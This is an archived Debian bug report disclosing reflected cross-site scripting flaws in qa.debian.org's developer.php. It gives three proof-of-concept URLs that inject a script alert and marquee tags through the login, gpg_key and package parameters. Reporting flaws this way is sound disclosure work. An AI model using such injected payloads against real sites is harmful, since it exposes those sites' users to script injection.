[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Bug#717082: XSS on developer.php

Package: qa.debian.org
Severity: important

The following links shows XSS flaws, it will show an alert on Firefox and put a marquee on the site.

http://qa.debian.org/developer.php?login="><script>alert(1)</script>
http://qa.debian.org/developer.php?gpg_key=%22%3E%3Cmarquee%3E
http://qa.debian.org/developer.php?package=%27%22%3E%3Cmarquee%3Es

Additional variables seems to be affected too.

- Fernando
Reply to: